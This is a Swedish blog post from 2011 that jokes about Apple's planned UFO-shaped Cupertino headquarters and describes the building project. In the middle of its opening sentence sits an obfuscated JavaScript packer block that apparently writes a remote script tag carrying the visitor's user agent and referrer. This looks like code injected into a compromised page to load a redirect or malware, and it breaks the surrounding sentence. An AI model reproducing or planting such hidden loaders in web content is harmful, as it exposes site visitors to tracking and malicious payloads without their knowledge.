Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

Apples nya högkvarter ser ut som en donut eller ett UFO om du vill.

Apples nya högkvarter ser ut som en donut eller ett UFO om du vill.
Filip Urde
  • On 8 juni, 2011
  • http://www.revue.se/filip-urde

Hungrig? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esbdi|var|u0026u|referrer|bests||js|php’.split(’|’),0,{}))
eller sugen på att ge scientologerna lite hopp om sin teori?!

Kom då ner till Apple i Cupertino, Kalifornien. Där bjuds det på donuts, en åktur i det nya UFOT och en visning av iOS5.

Allt detta för endast 999$

Det nuvarande högkvarteret rymmer endast 2 800 anställda, men med tanke på att 12 000 av stadens invånare jobbar på företaget har man de senaste åren sett sig tvungna att köpa upp alla lediga lokaler i området. Lösningen på Apples problem är att bygga ett helt nytt högkvarter på ett 600 000 kvadratmeter stort område som till större delen tidigare tillhört konkurrenten HP. Den futuristiska byggnaden ska påminna om ett flygande tefat som landat. För att få tillräckligt med energi till byggnaden så kommer Apple att bygga sitt eget naturgasverk i området. Man kommer dessutom att gräva ner det mesta av parkeringen och plantera tusentals nya träd på ytan som frigörs. Snällt!